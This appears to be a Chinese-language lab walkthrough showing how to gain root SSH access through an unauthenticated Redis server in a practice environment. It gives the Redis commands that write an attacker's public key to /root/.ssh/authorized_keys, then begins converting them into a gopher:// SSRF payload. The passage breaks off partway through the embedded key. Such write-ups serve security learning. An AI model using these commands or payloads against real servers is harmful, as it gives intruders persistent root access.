目录
我这里用了Web-Redis-Lab漏洞环境来演示
攻击机kali:192.168.168.128
目标机:192.168.168.134
centos
1、kali生成密钥
使用ssh-keygen -t rsa生成密钥,id_rsa是私钥,id_rsa.pub是公钥,我们要用的就是公钥
ssh-keygen -t rsa
2、redis数据库写入公钥
将上面kali中的id_rsa.pub的公钥内容取出,通过redis数据库将公钥写入到/root/.ssh下,注意的是,写入的文件名必须是authorized_keys
flushall
set 1 '公钥内容'
config set dir /root/.ssh
config set dbfilename authorized_keys
save
Redis服务器与客户端通过RESP协议通信,所以需要将上面的内容编译为RESR协议的格式:
gopher://127.0.0.1:6379/_*1
$8
flushall
*3
$3
set
$1
1
$567
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCzM2dS0hJe/04kvRqW8zPSs+T1/XT0hWU+RVvvoSd3QhMhhaMoFLsajUBZ4L3X35Jrp5XrHFGAlIovvFT53L7/Q7ofAzsRaK1nnWU24KJe5Be/xnRNNFEbdz/FE7pmuCHerW5/MR8av9AMNwwtHWP+SEeb8rqBrB72FHQEVce4rBGauiPnmIdC0G7VRCc0zUAJGCK4Q1jBZz70wzQNrENm38DsyweXAs8Q2bntzXGOjgWpSXudqGVOxHYAfft6KwnyV+wtU3wQWGFwgSRfu4qiqx9CYfd9tQubSAuJ+MIqJs9MBauQjJNa+jO+QqSUWoE3CZrzQrQiSgxZWxF4U8sb5ijyaKuLZ3+T1IDcAwx6ecANTgFG1RpwE23ktna/jynqdYdS3JNjFqTSI4f